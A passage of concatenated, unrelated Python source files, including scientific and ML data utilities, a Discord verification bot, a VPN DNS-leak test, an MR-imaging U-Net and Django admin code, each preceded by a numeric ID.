>>> x.ignore_a_b(10, 20, 30, 40)
>>> (x.a, x.b, x.c, x.d)
(1, 2, 30, 40)
>>> x.ignore_c_d(100, 200, 300, 400)
>>> (x.a, x.b, x.c, x.d)
(100, 200, 30, 40)
>>> class c:
... __slots__ = ['a', 'b', 'c']
...
... def __init__(self, a, b):
... AssignMemberVariablesFromParameters()
>>> x = c(1, 2)
>>> (x.a, x.b)
(1, 2)
"""
args, varargs, varkw, defaults = inspect.getargvalues(inspect.stack()[1][0])
self = args[0]
if exclude == None:
exclude = []
else:
exclude = [arg for arg in exclude]
if onlyInclude == None:
onlyInclude = [arg for arg in args if arg != self]
if varkw:
onlyInclude += [arg for arg in defaults[varkw].keys() if arg != self]
for arg in onlyInclude:
if arg not in exclude:
if arg in defaults:
value = defaults[arg]
elif varkw and arg in defaults[varkw]:
value = defaults[varkw][arg]
else:
value = None
            # set the attribute on the caller's object (also works with __slots__ classes)
            setattr(defaults[self], arg, value)
470142
import numpy as np
## define zigzag
def find_loopout_regions(zxys, region_ids=None,
method='neighbor', dist_th=1500,
neighbor_region_num=5):
"""Function to find loopout, or zig-zag features within chromosomes.
Inputs:
Outputs:
"""
# convert inputs
from ..spot_tools.scoring import _local_distance
from ..spot_tools.scoring import _neighboring_distance
_zxys = np.array(zxys)
# if region ids not specified, presume it is continuous
if region_ids is None:
region_ids = np.arange(len(_zxys))
else:
region_ids = np.array(region_ids)
# identify distance to neighbors
if method == 'neighbor':
_nb_dists = _neighboring_distance(zxys, spot_ids=region_ids, neighbor_step=1)[:-1]
_loopout_flags = np.zeros(len(zxys))
_loopout_flags[1:] += (_nb_dists >= dist_th) * (1-np.isnan(_nb_dists))
_loopout_flags[:-1] += (_nb_dists >= dist_th) * (1-np.isnan(_nb_dists))
return _loopout_flags == 2
elif method == 'local':
_lc_dists = _local_distance(zxys, spot_ids=region_ids,
sel_zxys=zxys, sel_ids=region_ids, local_size=neighbor_region_num)
return _lc_dists >= dist_th
else:
raise ValueError(f"wrong input method:{method}, exit.")
470162
from __future__ import print_function
import numpy as np
from ..tools.classifiertools import to_onehot
class Generator(object):
def __init__(
self,
preprocessor,
segment_ids,
n_classes,
train=True,
batch_size=16,
shuffle=False,
):
self.preprocessor = preprocessor
self.segment_ids = segment_ids
self.n_classes = n_classes
self.train = train
self.batch_size = batch_size
self.shuffle = shuffle
self.n_segments = len(self.segment_ids)
self.n_batches = int(np.ceil(float(self.n_segments) / batch_size))
self._i = 0
def __iter__(self):
return self
def next(self):
if self.shuffle and self._i == 0:
np.random.shuffle(self.segment_ids)
self.batch_ids = self.segment_ids[self._i : self._i + self.batch_size]
self._i = self._i + self.batch_size
if self._i >= self.n_segments:
self._i = 0
batch_segments, batch_classes = self.preprocessor.get_processed(
self.batch_ids, train=self.train
)
batch_segments = batch_segments[:, :, :, :, None]
batch_classes = to_onehot(batch_classes, self.n_classes)
return batch_segments, batch_classes
class GeneratorFeatures(object):
def __init__(self, features, classes, n_classes=2, batch_size=16, shuffle=True):
self.features = features
self.classes = np.asarray(classes)
self.n_classes = n_classes
self.batch_size = batch_size
self.shuffle = shuffle
self.n_samples = features.shape[0]
self.n_batches = int(np.ceil(float(self.n_samples) / batch_size))
self._i = 0
self.sample_ids = list(range(self.n_samples))
if shuffle:
np.random.shuffle(self.sample_ids)
def next(self):
batch_ids = self.sample_ids[self._i : self._i + self.batch_size]
self._i = self._i + self.batch_size
if self._i >= self.n_samples:
self._i = 0
batch_features = self.features[batch_ids, :]
batch_classes = self.classes[batch_ids]
batch_classes = to_onehot(batch_classes, self.n_classes)
return batch_features, batch_classes
470240
import sys
if sys.version_info < (3, 0):
reload(sys) # noqa: F821
sys.setdefaultencoding("utf-8")
470243
import os
import math
import numpy as np
from torchvision import transforms
from torch.utils.data import DataLoader
from torch.utils.data.sampler import SubsetRandomSampler
from src.utils import args
from .datasets import CIFAR10, CelebA, Imagenette, ImageNet32, ImageNet64
ROOT = './data_root/'
# ----- Dataset Splitter -----
def get_samplers(num_train, valid_size):
use_percentage=True if isinstance(valid_size, float) else False
# obtain training indices that will be used for validation
indices = list(range(num_train))
if use_percentage:
np.random.shuffle(indices)
split = int(np.floor(valid_size * num_train))
train_idx, valid_idx = indices[split:], indices[:split]
else:
train_idx, valid_idx = indices[:-valid_size], indices[-valid_size:]
# define samplers for obtaining training and validation batches
train_sampler = SubsetRandomSampler(train_idx)
valid_sampler = SubsetRandomSampler(valid_idx)
return train_sampler, valid_sampler
# ----- Data Transformations -----
def data_transformations(dataset):
if dataset in ['CIFAR10', 'Imagenette', 'ImageNet32', 'ImageNet64']:
res = args.img_resize if args.img_resize is not None else 32
train_transform = transforms.Compose([
transforms.Resize((res, res)),
transforms.RandomHorizontalFlip(),
transforms.Pad(int(math.ceil(res * 0.05)), padding_mode='edge'),
transforms.RandomAffine(degrees=0, translate=(0.05, 0.05)),
transforms.CenterCrop(res),
transforms.ToTensor()
])
valid_transform = transforms.Compose([
transforms.Resize((res, res)),
transforms.ToTensor()
])
elif dataset in ['CelebA']:
Crop = transforms.Lambda(lambda x: transforms.functional.crop(x, 40, 15, 148, 148))
res = args.resolution
train_transform = valid_transform = transforms.Compose([
Crop,
transforms.Resize((res, res)),
transforms.ToTensor()
])
else:
raise NotImplementedError
return train_transform, valid_transform
# ----- DataLoader -----
def dataloader(dataset=args.dataset, data_root=ROOT, batch_size=args.batch_size, num_workers=6, pin_memory=True):
# dataset and data loader kwargs
kwargs = {} if args.device == 'cpu' else {'num_workers': num_workers, 'pin_memory': pin_memory}
dataset_kwargs = {'root':os.path.join(data_root, dataset), 'download':True}
loader_kwargs = {'batch_size':batch_size, **kwargs}
# get data transformation
train_transform, valid_transform = data_transformations(dataset)
# build datasets
train_data = globals()[dataset](train=True, transform=train_transform, **dataset_kwargs)
valid_data = globals()[dataset](train=True, transform=valid_transform, **dataset_kwargs)
test_data = globals()[dataset](train=False, transform=valid_transform, **dataset_kwargs)
# define samplers for obtaining training and validation batches
train_sampler, valid_sampler = get_samplers(len(train_data), 0.15)
# Build dataloaders
train_loader = DataLoader(train_data, sampler=train_sampler, **loader_kwargs)
valid_loader = DataLoader(valid_data, sampler=valid_sampler, **loader_kwargs)
test_loader = DataLoader(test_data, shuffle=False, **loader_kwargs)
return train_loader, valid_loader, test_loader
if __name__ == "__main__":
pass
470251
from logging import getLogger
import numpy as np
from sklearn.model_selection import cross_val_score
from ...utils import generate_features, BaseWrapper
class RecursiveElimination(BaseWrapper):
"""Recursive feature elimination algorithm.
Parameters
----------
estimator : object
A supervised learning estimator that should have a fit(X, y) method, a
predict(X) method and a field corresponding to feature weights.
n_features : int
Number of features to leave.
measure : string or callable
A standard estimator metric (e.g. 'f1' or 'roc_auc') or a callable with
signature measure(estimator, X, y) which should return only a single
value.
weight_func : callable
A function to extract weights from the model.
cv : int
Number of folds in cross-validation.
See Also
--------
<NAME>., <NAME>., <NAME>., & <NAME>., “Gene selection for
cancer classification using support vector machines”, Mach. Learn.,
46(1-3), 389–422, 2002.
https://link.springer.com/article/10.1023/A:1012487302797
Examples
--------
>>> from sklearn.datasets import make_classification
>>> from ITMO_FS.wrappers import RecursiveElimination
>>> from sklearn.svm import SVC
>>> import numpy as np
>>> dataset = make_classification(n_samples=100, n_features=20,
... n_informative=4, n_redundant=0, shuffle=False, random_state=42)
>>> x, y = np.array(dataset[0]), np.array(dataset[1])
>>> model = SVC(kernel='linear')
>>> rfe = RecursiveElimination(model, 5, measure='f1_macro',
... weight_func=lambda model: np.square(model.coef_).sum(axis=0)).fit(x, y)
>>> rfe.selected_features_
array([ 0, 1, 2, 11, 19], dtype=int64)
"""
def __init__(self, estimator, n_features, measure, weight_func, cv=3):
self.estimator = estimator
self.n_features = n_features
self.measure = measure
self.weight_func = weight_func
self.cv = cv
def _fit(self, X, y):
"""Fit the wrapper.
Parameters
----------
X : array-like, shape (n_samples, n_features)
The training input samples.
y : array-like, shape (n_samples,)
the target values.
Returns
-------
None
"""
self.selected_features_ = generate_features(X)
while self.selected_features_.shape[0] != self.n_features:
getLogger(__name__).info(
"Current selected set: %s", self.selected_features_)
self._estimator.fit(X[:, self.selected_features_], y)
weights = self.weight_func(self._estimator)
getLogger(__name__).info(
"Weights for all selected features: %s", weights)
least_important = np.argmin(weights)
getLogger(__name__).info(
"Deleting the least important feature %d",
self.selected_features_[least_important])
self.selected_features_ = np.delete(self.selected_features_,
least_important)
self.best_score_ = cross_val_score(self._estimator,
X[:, self.selected_features_], y, cv=self.cv,
scoring=self.measure).mean()
self._estimator.fit(X[:, self.selected_features_], y)
470281
def fact(n):
if (n == 1):
return n;
else:
return n*fact(n-1);
test = int(input())
for i in range (0,test):
val = int(input())
print(fact(val))
##Example Test Case
# Sample input:
# 4
# 1
# 2
# 5
# 3
# Sample output:
#
# 1
# 2
# 120
# 6
470282
import aiohttp
import json
from random import choice, choices, randint, sample
from discord import File
from discord.ext import commands
from discord.utils import get
class Verification(commands.Cog):
    # The closer this number is to 1, the more often the word list is refreshed (linear).
def __init__(self, bot):
self.bot = bot
self.config_full = json.loads(open('assets/config.json').read())
self.word_list_refresh_rate = 99
self.word_cache_size = 1000
@commands.command()
@commands.has_permissions(manage_guild=True)
async def verification(self, ctx, state: bool):
"""Enable or disable the verification system"""
config = self.config_full[str(ctx.message.guild.id)]
if state is True and config["verification_channel"] is None:
channel = await ctx.message.guild.create_text_channel(name="Verification")
role = await ctx.message.guild.create_role(name="Unverified")
config.update(verification_channel=channel.id, verification_role=role.id)
json.dump(self.config_full, open('config.json', 'w'), indent=2, separators=(',', ': '))
elif state is False and config["verification_channel"] is not None:
channel = get(ctx.message.guild.text_channels, id=config["verification_channel"])
role = get(ctx.message.guild.roles, id=config["verification_role"])
await channel.delete()
await role.delete()
config.update(verification_channel=None, verification_role=None)
json.dump(self.config_full, open('config.json', 'w'), indent=2, separators=(',', ': '))
@commands.command()
async def verify(self, ctx):
"""Verify yourself (the bot will DM you)"""
try:
# Increment if use count exists
self.verify.use_count += 1
except AttributeError:
# Otherwise initialize it on verify function object for persistence
self.verify.use_count = 1
if self.verify.use_count % self.word_list_refresh_rate == 1:
# Retrieve list of words from MIT page
async with aiohttp.ClientSession() as client:
async with client.get("https://www.mit.edu/~ecprice/wordlist.10000") as response:
text = await response.text()
self.verify.words = sample(text.splitlines(), self.word_cache_size)
await client.close()
challenge_selection = randint(0, 2)
challenge_wording = ['computation', 'phrase', 'single word basic color displayed on the pillow']
# Some initialization
random_phrase = '( Pillows are so comfy 😊)'
image_selection = ['', None]
answer_value = 0
# Image color challenge
if challenge_selection == 2:
image_answer_pairing = [
['blue', './assets/blue.jpg'],
['red', './assets/red.jpg'],
['white', './assets/white.jpg'],
['black', './assets/black.jpg']
]
image_selection = image_answer_pairing[randint(0, 3)]
# Math challenge
elif challenge_selection == 1:
random_phrase = f'{randint(1,9)}{choice(["+","-","*"])}{randint(1,9)}{choice(["+","-","*"])}{randint(1,9)}'
answer_value = str(eval(random_phrase))
# Phrase challenge
else:
# Pick three random words and DM them to the user
random_phrase = ' '.join(choices(self.verify.words, k=3))
insertion_point = randint(1, len(random_phrase) - 2)
random_phrase_modded = f'{random_phrase[:insertion_point+1]}' \
f'{random_phrase[insertion_point+1:]}' \
f''.replace('o', 'ο').replace('e', 'е').replace('a', 'а').replace('i', 'і')
expected_answer = [random_phrase, answer_value, image_selection[0]][challenge_selection]
await ctx.message.author.send(
f"Please reply with the following {challenge_wording[challenge_selection]}: {random_phrase_modded}",
file=File(image_selection[1]) if challenge_selection == 2 else None)
# Wait for 30 seconds for the user to send back the verification phrase
await self.bot.wait_for("message", timeout=30, check=lambda message: message.content == expected_answer)
await ctx.message.author.send("Verification complete 👍")
# If they pass, remove the unverified role
config = json.loads(open('config.json', 'r').read())
role = get(ctx.guild.roles, id=config[str(ctx.guild.id)]["verification_role"])
await ctx.message.author.remove_roles(role)
@verify.error
async def verify_error(self, ctx, error):
if isinstance(error, commands.CommandInvokeError):
await ctx.message.author.send(f"Command timeout! Please rerun the command to verify. {error}")
def setup(bot):
bot.add_cog(Verification(bot))
470298
import tensorflow as tf
import time
"""
We employ a residual connection around each of the two sub-layers, followed by layer normalization.
That is, the output of each sub-layer is LayerNorm(x+ Sublayer(x)), where Sublayer(x) is the function implemented by the sub-layer itself. """
class LayerNormResidualConnection(object):
def __init__(self,x,y,layer_index,type,residual_dropout=0.1,use_residual_conn=True):
self.x=x
self.y=y
self.layer_index=layer_index
self.type=type
self.residual_dropout=residual_dropout
self.use_residual_conn=use_residual_conn
#call residual connection and layer normalization
def layer_norm_residual_connection(self):
print("LayerNormResidualConnection.use_residual_conn:",self.use_residual_conn)
##if self.use_residual_conn:
# x_residual=self.residual_connection()
# x_layer_norm=self.layer_normalization(x_residual)
#else:
x_layer_norm = self.layer_normalization(self.x)
return x_layer_norm
def residual_connection(self):
output=self.x + tf.nn.dropout(self.y, 1.0 - self.residual_dropout)
return output
# layer normalize the tensor x, averaging over the last dimension.
def layer_normalization(self,x):
"""
x should be:[batch_size,sequence_length,d_model]
:return:
"""
filter=x.get_shape()[-1] #last dimension of x. e.g. 512
print("layer_normalization:==================>variable_scope:","layer_normalization"+str(self.layer_index)+self.type)
with tf.variable_scope("layer_normalization"+str(self.layer_index)+self.type):
# 1. normalize input by using mean and variance according to last dimension
mean=tf.reduce_mean(x,axis=-1,keep_dims=True) #[batch_size,sequence_length,1]
variance=tf.reduce_mean(tf.square(x-mean),axis=-1,keep_dims=True) #[batch_size,sequence_length,1]
norm_x=(x-mean)*tf.rsqrt(variance+1e-6) #[batch_size,sequence_length,d_model]
# 2. re-scale normalized input back
scale=tf.get_variable("layer_norm_scale",[filter],initializer=tf.ones_initializer) #[filter]
bias=tf.get_variable("layer_norm_bias",[filter],initializer=tf.ones_initializer) #[filter]
output=norm_x*scale+bias #[batch_size,sequence_length,d_model]
return output #[batch_size,sequence_length,d_model]
def test():
start = time.time()
batch_size=128
sequence_length=1000
d_model=512
x=tf.ones((batch_size,sequence_length,d_model))
y=x*3-0.5
layer_norm_residual_conn=LayerNormResidualConnection(x,y,0,'encoder')
output=layer_norm_residual_conn.layer_norm_residual_connection()
end = time.time()
print("x:",x,";y:",y,";output:",output,";time spent:",(end-start))
#test()
470317
from onnxruntime.capi import _pybind_state as C
import threading
from functools import wraps
def run_once_aten_op_executor(f):
"""
Decorator to run a function only once.
:param f: function to be run only once during execution time despite the number of calls
:return: The original function with the params passed to it if it hasn't already been run before
"""
@wraps(f)
def aten_op_executor_wrapper(*args, **kwargs):
if not aten_op_executor_wrapper.has_run:
with aten_op_executor_wrapper.lock:
if not aten_op_executor_wrapper.has_run:
aten_op_executor_wrapper.has_run = True
return f(*args, **kwargs)
aten_op_executor_wrapper.lock = threading.Lock()
aten_op_executor_wrapper.has_run = False
return aten_op_executor_wrapper
@run_once_aten_op_executor
def load_aten_op_executor_cpp_extension():
from onnxruntime.training.ortmodule.torch_cpp_extensions import aten_op_executor
C.register_aten_op_executor(str(aten_op_executor.is_tensor_argument_address()),
str(aten_op_executor.execute_aten_operator_address()))
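# Illustration of the run-once guard with a hypothetical function (not part of
# onnxruntime; added only as a usage sketch): the decorated body executes on the
# first call, while later calls return None without re-running it.
if __name__ == "__main__":
    @run_once_aten_op_executor
    def _demo_init():
        print("initialized exactly once")
    _demo_init()
    _demo_init()  # no output: the has_run flag short-circuits this call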
470407
import FWCore.ParameterSet.Config as cms
from L1TriggerConfig.DTTPGConfigProducers.L1DTConfigFromDB_cfi import *
470425
from monosat import *
import functools
import math
import os
import random
import sys
print("Generate random 0-1 diophantine equation")
seed = random.randint(1,100000)
random.seed(seed)
print("RandomSeed=" + str(seed))
bitwidth=8
n_equations=3
n_vars=3
max_co = 10
vars=[]
for i in range(n_vars):
vars.append(BitVector(bitwidth))
for i in range(n_equations):
coefficients=[]
for c in range(n_vars):
coefficients.append(random.randint(0,1))
val = random.randint(0,max_co*n_vars)
rhs = BitVector(bitwidth, val)
sum = BitVector(bitwidth,0)
for j in range(len(coefficients)):
if coefficients[j]>0:
sum = sum + ( vars[j])
Assert(sum==rhs)
print(str(i) + ": " + str(coefficients) + " = " + str(val) )
result =Solve()
print("Result is " + str(result))
if(result):
for i in range(len(vars)):
print(str(i) + "= " + str(vars[i].value()))
470430
import sys, os, argparse
from OpenGL.GL.SUN import vertex
from tk3dv.extern.binvox import binvox_rw
from tk3dv.common import drawing
import tk3dv.nocstools.datastructures as ds
from PyQt5.QtWidgets import QApplication
import PyQt5.QtCore as QtCore
from PyQt5.QtGui import QKeyEvent, QMouseEvent, QWheelEvent
import numpy as np
from tk3dv.pyEasel import *
from EaselModule import EaselModule
from Easel import Easel
import OpenGL.GL as gl
class VGVizModule(EaselModule):
def __init__(self):
super().__init__()
def init(self, argv=None):
self.Parser = argparse.ArgumentParser(description='This module visualizes voxel grids.', fromfile_prefix_chars='@')
ArgGroup = self.Parser.add_argument_group()
ArgGroup.add_argument('-v', '--voxel-grid', help='Specify binvox or numpy file.', required=True)
self.Args, _ = self.Parser.parse_known_args(argv)
if len(sys.argv) <= 1:
self.Parser.print_help()
exit()
_, Ext = os.path.splitext(self.Args.voxel_grid)
if 'binvox' not in Ext and 'npz' not in Ext and 'npy' not in Ext:
raise RuntimeError('Not a binvox or numpy file')
print('[ INFO ]: Opening voxel grid from file:', self.Args.voxel_grid)
if 'binvox' in Ext:
with open(self.Args.voxel_grid, 'rb') as f:
self.VG = binvox_rw.read_as_3d_array(f)
self.VGDS = ds.VoxelGrid(self.VG)
else:
VGData = np.load(self.Args.voxel_grid)
# print(VGData.files) # 'full_voxel_grid', 'surface_voxel_grid'
self.VG = VGData['surface_voxel_grid']
self.VGDS = ds.VoxelGrid(self.VG)
self.PointSize = 3
self.showObjIdx = 0 # 0, 1, 2
def step(self):
pass
def drawVG(self, Alpha=0.8, ScaleX=1, ScaleY=1, ScaleZ=1):
if self.showObjIdx == 0 or self.showObjIdx == 1:
self.VGDS.drawVG(Alpha, ScaleX, ScaleY, ScaleZ)
if self.showObjIdx == 0 or self.showObjIdx == 2:
gl.glMatrixMode(gl.GL_MODELVIEW)
gl.glPushMatrix()
gl.glScale(ScaleX, ScaleY, ScaleZ)
self.VGDS.draw(pointSize=self.PointSize)
gl.glPopMatrix()
def draw(self):
gl.glMatrixMode(gl.GL_MODELVIEW)
gl.glPushMatrix()
gl.glTranslate(-20, -20, -20)
self.drawVG(0.7, 40, 40, 40)
gl.glPopMatrix()
def keyPressEvent(self, a0: QKeyEvent):
if a0.key() == QtCore.Qt.Key_Plus: # Increase or decrease point size
if self.PointSize < 20:
self.PointSize = self.PointSize + 1
if a0.key() == QtCore.Qt.Key_Minus: # Increase or decrease point size
if self.PointSize > 1:
self.PointSize = self.PointSize - 1
if a0.key() == QtCore.Qt.Key_T: # Toggle objects
self.showObjIdx = (self.showObjIdx + 1)%(3)
if __name__ == '__main__':
app = QApplication(sys.argv)
mainWindow = Easel([VGVizModule()], sys.argv[1:])
mainWindow.show()
sys.exit(app.exec_())
470432
import random
from multiprocessing.pool import ThreadPool
from desktop_local_tests.dns_helper import DNSHelper
from desktop_local_tests.local_test_case import LocalTestCase
from xv_leak_tools.exception import XVEx
from xv_leak_tools.log import L
class TestDNSVanillaAggressive(LocalTestCase):
'''Summary:
Test whether DNS leaks during regular VPN connection.
Details:
This test will first ask the system for all known DNS servers. It will then connect to the VPN
and perform multiple DNS requests in parallel. It asserts that the server used for the DNS
lookup was not one which was known to the system before connecting to the VPN and that it was
also one of the VPN server IPs. There is redundancy in this check but no harm.
Discussion:
The test is very similar to TestDNSVanilla but just performs multiple DNS lookups. Most
    providers should pass this test.
Weaknesses:
Currently uses dig to decide if DNS leaks. This isn't reliable for some VPN providers. Some
providers intercept DNS upstream and change the destination DNS server to their own server.
However dig will still report the server which it originally sent the request to.
Scenarios:
* Run on a system with DNS servers configured to be public IP addresses, e.g. 8.8.8.8.
* Run on a system with DNS servers configured to be local IP addresses, e.g. 192.0.0.0/24. This
is a common setup with home routers where the router acts as the DNS server.
'''
# TODO: Potentially make configurable
HOSTNAMES = [
'google.com', 'twitter.com', 'facebook.com', 'stackoverflow.com', 'yahoo.com', 'amazon.com',
]
# TODO: Potentially make configurable
NUMBER_OF_DNS_REQUESTS = 50
def __init__(self, devices, parameters):
super().__init__(devices, parameters)
self.dns_servers_before_connect = []
self.vpn_dns_servers = []
self.dns_helper = DNSHelper(self.localhost['dns_tool'])
self.thread_pool = ThreadPool(processes=10)
def dns_server_known(self, hostname):
server = self.localhost['dns_tool'].lookup(hostname)[0]
self.assertIsIn(
server, self.dns_servers_before_connect,
"DNS server used was {} but that wasn't known to the system".format(server))
def dns_server_is_vpn_dns(self, hostname):
self.dns_helper.dns_server_is_vpn_server(
self.dns_servers_before_connect, self.vpn_dns_servers, hostname=hostname)
def check_multiple_asynchronously(self, func):
results = []
# TODO: Think about what else we could do here. More domains? Different methods of DNS
# lookup?
for _ in range(0, TestDNSVanillaAggressive.NUMBER_OF_DNS_REQUESTS):
# Warning: If you miss the trailing comma in the args to the func passed to apply_async
# then the string will be interpreted as an array of arguments!
results.append(self.thread_pool.apply_async(
func, (random.choice(TestDNSVanillaAggressive.HOSTNAMES),)))
# There is no result returned from check_dns, but .get() will propagate any exception
# thrown by check_dns, which is what we want.
first_exception = None
for result in results:
try:
result.get()
except XVEx as ex:
if first_exception is None:
first_exception = ex
# pylint: disable=raising-bad-type
if first_exception is not None:
raise first_exception
def test(self):
L.describe('Find all known DNS servers before connecting to VPN')
self.dns_servers_before_connect = self.localhost['dns_tool'].known_servers()
L.info("All known DNS servers are: {}".format(self.dns_servers_before_connect))
# Sanity check that the DNS servers we initially use are known. This is not strictly part
# of the test.
self.check_multiple_asynchronously(self.dns_server_known)
L.describe('Open and connect the VPN application')
self.localhost['vpn_application'].open_and_connect()
self.vpn_dns_servers = self.localhost['vpn_application'].dns_server_ips()
L.info("VPN DNS servers are: {}".format(self.vpn_dns_servers))
L.describe(
"Check DNS server used was a VPN DNS server by doing {} asynchronous DNS "
"requests".format(TestDNSVanillaAggressive.NUMBER_OF_DNS_REQUESTS))
self.check_multiple_asynchronously(self.dns_server_is_vpn_dns)
470442
from ..peer import Peer
class FormUpdate:
def __init__(self, json_object):
self.update_id = json_object.get("updateId")
self.form_id = json_object.get("formId")
self.dialog = Peer(json_object.get("dialog"))
self.sender = Peer(json_object.get("sender"))
@property
def chat(self):
return self.dialog
470458
import torch.nn as nn
import numpy as np
from unet import UNet
class XTYTUNet(nn.Module):
"""
Create a XT,YT U-Net
the network is used to process a 2D cine MR image of shape
(1,2,Nx,Ny,Nt)
the CNN first "rotates" the sample to the xt- and the yt-view,
then applies a U-Net on the spatio-temporal slices and
then re-assembles to cine MR image from the processed slices.
N.B.
i) as a default, the CNN used for the xt-view and the yt-view is the same
since radial-undersampling artefacts have a "noise-like" structure.
For different sampling patterns, one could set weight_sharing to False
ii) Note that wheter to use the residual connection or not, is decided in
the class XTYTFFTCNN
"""
def __init__(self,n_ch_in=2,n_ch_out=2, n_enc_stages=3, n_convs_per_stage=4,n_filters=64,weight_sharing=True):
super(XTYTUNet, self).__init__()
self.n_ch_in = n_ch_in
self.n_ch_out = n_ch_out
self.n_filters = n_filters
self.n_convs_per_stage = n_convs_per_stage
self.weight_sharing = weight_sharing
self.n_enc_stages=n_enc_stages
#dimensionality of the U-Net; this is alwys 2 for the XT,YT-Net
dim=2
#if weight sharing is applied for the xt- and the yt-CNN,
#might me beneficial for Cartesian sampling trajectories, for example;
if weight_sharing:
self.conv_xt_yt = UNet(dim,n_ch_in=n_ch_in,n_ch_out=n_ch_out,n_enc_stages=n_enc_stages,n_convs_per_stage=n_convs_per_stage,
n_filters=n_filters)
else:
self.conv_xt = UNet(dim,n_ch_in=n_ch_in,n_ch_out=n_ch_out,n_enc_stages=n_enc_stages,n_convs_per_stage=n_convs_per_stage,
n_filters=n_filters)
self.conv_yt = UNet(dim,n_ch_in=n_ch_in,n_ch_out=n_ch_out,n_enc_stages=n_enc_stages,n_convs_per_stage=n_convs_per_stage,
n_filters=n_filters)
self.reshape_op_xyt2xt_yt = XYT2XT_YT()
self.reshape_op_xt_yt2xyt = XT_YT2XYT()
def forward(self, x):
#get the number of sampels used; needed for re-assembling operation
# x has the shape (mb,2,nx,ny,nt)
mb = x.shape[0]
#input is 5d -> output is 4d
x_xt = self.reshape_op_xyt2xt_yt(x,'xt')
x_yt = self.reshape_op_xyt2xt_yt(x,'yt')
#input is 4d
if self.weight_sharing:
x_xt_conv = self.conv_xt_yt(x_xt)
x_yt_conv = self.conv_xt_yt(x_yt)
else:
x_xt_conv = self.conv_xt(x_xt)
x_yt_conv = self.conv_yt(x_yt)
#input is 4d -> output is 5d
x_xt_r = self.reshape_op_xt_yt2xyt(x_xt_conv,'xt',mb)
x_yt_r = self.reshape_op_xt_yt2xyt(x_yt_conv,'yt',mb)
#5d tensor
x = 0.5*(x_xt_r + x_yt_r)
return x
class XYT2XT_YT(nn.Module):
"""
Class needed for the reshaping operator:
Given x with shape (mb,2,Nx,Ny,Nt), x is reshped to have
either shape (mb*Nx,2,Ny,Nt) for the yt-domain or
the shape (mb*Ny,2,Nx,Nt) for the xt-domain
"""
def __init__(self):
super(XYT2XT_YT, self).__init__()
def forward(self, x, reshape_type):
return xyt2xt_yt(x,reshape_type)
def xyt2xt_yt(x,reshape_type):
#x has shape (mb,2,nx,ny,nt)
mb,nch,nx,ny,nt = x.shape
if reshape_type=='xt':
x = x.permute(0,2,1,3,4).view(mb*nx, nch, ny, nt)
elif reshape_type =='yt':
x = x.permute(0,3,1,2,4).view(mb*ny, nch, nx, nt)
return x
class XT_YT2XYT(nn.Module):
"""
Class needed for the reassembling the cine MR image to its original shape:
reverses the operation XYT2XT_YT,
note that the mini-batch size is needed
"""
def __init__(self):
super(XT_YT2XYT, self).__init__()
def forward(self, x, reshape_type,mb):
return xt_yt2xyt(x, reshape_type,mb)
def xt_yt2xyt(x,reshape_type,mb):
if reshape_type =='xt':
_,nch,ny,nt=x.shape
        nx = int(x.shape[0]/mb)
x = x.view(mb,nx,nch,ny,nt).permute(0,2,1,3,4)
elif reshape_type=='yt':
_,nch,nx,nt=x.shape
        ny = int(x.shape[0]/mb)
x = x.view(mb,ny,nch,nx,nt).permute(0,2,3,1,4)
return x
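# Minimal usage sketch (not part of the original module): push a random tensor with
# the expected cine-MR layout (mini-batch, 2 channels, Nx, Ny, Nt) through the
# XT,YT U-Net. This assumes the accompanying `unet.UNet` imported above preserves
# spatial dimensions (standard for padded U-Nets); sizes are chosen divisible by
# 2**n_enc_stages.
if __name__ == '__main__':
    import torch
    net = XTYTUNet(n_ch_in=2, n_ch_out=2, n_enc_stages=2, n_convs_per_stage=2, n_filters=8)
    x = torch.randn(1, 2, 32, 32, 16)  # (mb, channels, Nx, Ny, Nt)
    with torch.no_grad():
        y = net(x)
    print(y.shape)  # should equal the input shape if UNet is size-preserving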
470463
import setuptools
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setuptools.setup(
name="audax",
version="0.0.4",
author='<NAME>',
description="audio ML for Jax",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/SarthakYadav/audio_data_utils",
# package_dir={"": ""},
packages=[
"audax",
"audax.commons",
"audax.core",
"audax.frontends",
"audax.models",
"audax.models.layers",
"audax.transforms",
"audax.training_utils",
"audax.training_utils.data_v2",
],
python_requires=">=3.7"
)
470507
import renderdoc as rd
import rdtest
class D3D12_Render_Pass(rdtest.TestCase):
demos_test_name = 'D3D12_Render_Pass'
def check_capture(self):
rp1 = self.find_action("RP 1")
rp2 = self.find_action("RP 2")
action = next(d for d in rp1.children if d.flags & rd.ActionFlags.Drawcall)
self.controller.SetFrameEvent(action.eventId, False)
self.check_triangle(back=[0.0, 0.0, 1.0, 1.0])
action = next(d for d in rp2.children if d.flags & rd.ActionFlags.Drawcall)
self.controller.SetFrameEvent(action.eventId, False)
self.check_triangle(back=[1.0, 0.0, 1.0, 1.0])
action = self.get_last_action()
self.controller.SetFrameEvent(action.eventId, False)
self.check_pixel_value(action.copyDestination, 0.45, 0.45, [0.0, 0.0, 1.0, 1.0])
self.check_pixel_value(action.copyDestination, 0.55, 0.55, [1.0, 0.0, 1.0, 1.0])
self.check_pixel_value(action.copyDestination, 0.25, 0.25, [0.0, 1.0, 0.0, 1.0])
self.check_pixel_value(action.copyDestination, 0.75, 0.75, [0.0, 1.0, 0.0, 1.0])
self.check_pixel_value(action.copyDestination, 0.75, 0.25, [0.0, 0.0, 0.0, 1.0])
self.check_pixel_value(action.copyDestination, 0.25, 0.75, [0.0, 0.0, 0.0, 1.0])
470521
from django.contrib import admin
from councilmatic.subscriptions import models
#class KeywordInline(admin.StackedInline):
# model = KeywordSubscription
# extra = 3
#class CouncilmemberInline(admin.StackedInline):
# model = CouncilMemberSubscription
# extra = 3
#class SubscriptionAdmin(admin.ModelAdmin):
# inlines = [KeywordInline, CouncilmemberInline]
#class LegActionInline(admin.StackedInline):
# model = LegAction
# extra = 1
class ContentFeedParameterInline(admin.StackedInline):
model = models.ContentFeedParameter
extra = 0
class ContentFeedRecordAdmin(admin.ModelAdmin):
inlines = [ContentFeedParameterInline]
def queryset(self, request):
return models.ContentFeedRecord.objects.prefetch_related('feed_params')
class SubscriptionDispatchRecordInline(admin.TabularInline):
model = models.SubscriptionDispatchRecord
extra = 0
class SubscriptionAdmin(admin.ModelAdmin):
list_display = ['__unicode__', 'last_sent']
inlines = [SubscriptionDispatchRecordInline]
def queryset(self, request):
return models.Subscription.objects.select_related('feed_record').prefetch_related('feed_record__feed_params')
class SubscriberAdmin(admin.ModelAdmin):
list_display = ['username', 'date_joined', 'last_login']
